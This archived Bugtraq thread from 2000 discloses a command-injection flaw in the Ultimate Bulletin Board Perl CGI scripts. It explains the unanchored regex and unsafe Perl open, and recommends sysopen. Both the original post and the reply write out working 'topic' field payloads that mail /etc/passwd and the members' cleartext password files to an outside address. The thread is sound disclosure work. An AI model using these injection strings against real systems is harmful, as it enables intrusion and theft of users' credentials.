Re: perl-cgi hole in UltimateBB by Infopop Corp.

From: Kevin Hillabolt (khillat_private)
Date: Mon Feb 14 2000 - 16:46:11 PST


    It works on the full version also...
    
    Little different syntax:
    topic=012345.cgi|cat%20../Members/*|mail hackerat_private|
    (note the ../ on the Members.  You have to go up a directory to get the
    file.  Maybe you could stop it via simple folder permissions??)
    
    Regards,
    Kevin Hillabolt
    
    
    ----- Original Message -----
    From: "Sergei A. Golubchik" <sergat_private>
    To: <BUGTRAQat_private>
    Sent: Friday, February 11, 2000 1:49 PM
    Subject: perl-cgi hole in UltimateBB by Infopop Corp.
    
    
    > Hello.
    >
    > Writing cgi scripts in perl is simple. It's also rather safe,
    > providing authors follow very simple instructions. But they don't.
    >
    > Browsing some site, I found that their forums were based not on
    > home-made scripts, but rather on a commercial software product. Hey,
    > said I to myself, remember that story about the pcweek hack? They used
    > the commercial package photoads. Let's look at what that Ultimate
    > Bulletin Board by Infopop is.
    >
    > I grabbed the freeware version from http://www.ultimatebb.com and
    > after 10 minutes of grepping found these lines:
    >
    > ubb_library.pl:901-902
    >           if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
    >           open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");
    >
    > (notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while
    > writing it ? Girls ?)
    >
    > And the $ThreadFile takes its value directly from the hidden (hmm!)
    > field `topic'.
    >
    > So when I filled the form with
    > topic='012345.ubb|mail hackerat_private </etc/passwd|'
    > It happily gives me /etc/passwd. And
    > topic='012345.ubb|cat Members/*|mail hackerat_private|'
    > shows all users of the bulletin board, and their passwords too (in
    > cleartext!).
    >
    > So one only needs to open the "reply" form in the forum, save it to
    > disk, and set the topic field to whatever he wants. And this stupid UBB
    > (at least the freeware version) doesn't keep logs (unless you count the
    > so-called hacklog, used when the condition above is not met).
    >
    > The fix is obvious. But the rule of thumb is "do not use magic perl
    > open". At least in cgi scripts. If you want to open a regular file,
    > sysopen does the trick as well.
    >
    > And again: CHECK EVERYTHING!
    >
    > Regards,
    > SerG.
    >
    > P.S. Vendor was notified.
    >
    >
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:34:53 PDT